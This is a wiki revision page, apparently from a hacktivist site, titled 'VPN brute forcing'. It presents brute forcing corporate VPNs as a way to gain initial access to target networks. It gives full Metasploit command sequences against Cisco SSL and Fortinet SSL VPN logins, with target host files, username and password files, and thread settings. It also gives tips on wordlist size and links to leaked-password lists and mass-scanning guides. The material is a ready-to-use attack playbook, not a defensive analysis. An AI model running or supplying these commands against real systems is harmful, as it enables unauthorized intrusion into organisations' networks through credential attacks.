VPN brute forcing: Difference between revisions
Jump to navigation
Jump to search
mNo edit summary |
mNo edit summary |
||
| (7 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
Brute force common corporate VPNs to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning | [https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a large username and password file will cause the module to stall for a very long time. To fix this issue use [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-users.txt smaller user] and [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-passwords.txt password] files. | ||
Word lists: | |||
* https://enlacehacktivista.org/index.php/Initial_Access_Tactics,_techniques_and_procedures#Common_and_leaked_passwords | |||
== CISCO == | == CISCO == | ||
| Line 5: | Line 8: | ||
sudo systemctl start postgresql | sudo systemctl start postgresql | ||
msfdb init | msfdb init | ||
msfconsole | msfconsole | ||
use auxiliary/scanner/http/cisco_ssl_vpn | use auxiliary/scanner/http/cisco_ssl_vpn | ||
| Line 19: | Line 23: | ||
sudo systemctl start postgresql | sudo systemctl start postgresql | ||
msfdb init | msfdb init | ||
msfconsole | msfconsole | ||
use auxiliary/scanner/http/fortinet_ssl_vpn | use auxiliary/scanner/http/fortinet_ssl_vpn | ||
| Line 28: | Line 33: | ||
run | run | ||
</pre> | </pre> | ||
Latest revision as of 12:19, 30 March 2024
Brute force common corporate VPNs to gain initial access to target networks. Install metasploit and then see Initial access TTPs for mass port scanning. For this to work properly using a large username and password file will cause the module to stall for a very long time. To fix this issue use smaller user and password files.
Word lists:
CISCO
sudo systemctl start postgresql msfdb init msfconsole use auxiliary/scanner/http/cisco_ssl_vpn set RHOSTS file:/home/targets_443.txt set RPORT 443 set USER_FILE /home/users.txt set PASS_FILE /home/pass.txt set threads 10 run
FORTI SSL VPN
sudo systemctl start postgresql msfdb init msfconsole use auxiliary/scanner/http/fortinet_ssl_vpn set RHOSTS file:/home/targets_10443.txt set RPORT 10443 set USER_FILE /home/users.txt set PASS_FILE /home/pass.txt set threads 10 run